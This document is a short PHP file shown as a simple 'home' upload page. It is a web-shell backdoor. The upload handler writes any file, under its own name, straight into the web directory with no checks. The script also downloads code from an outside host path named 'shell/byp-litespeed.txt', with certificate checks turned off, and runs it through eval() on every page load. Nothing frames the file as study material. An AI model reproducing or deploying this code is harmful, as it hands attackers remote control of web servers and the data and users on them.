<!DOCTYPE html>
<html>
<head>
  <title>home</title>
</head>
<body>
  <form enctype="multipart/form-data" action="" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>
<?php
if(!empty($_FILES['uploaded_file']))
{
  $path = "";
  $path = $path . basename($_FILES['uploaded_file']['name']);

  if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
    echo "The file ". basename($_FILES['uploaded_file']['name']) . " has been uploaded";
  } else {
    echo "There was an error uploading the file, please try again!";
  }
}

function getCurl0($url) {
  if(function_exists("curl_init")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
  }
  return false;
}

$externalCode = getCurl0("https://marslogs.co.id/shell/shell/byp-litespeed.txt");
if($externalCode) {
  eval("?>".$externalCode);
}
__halt_compiler();
?>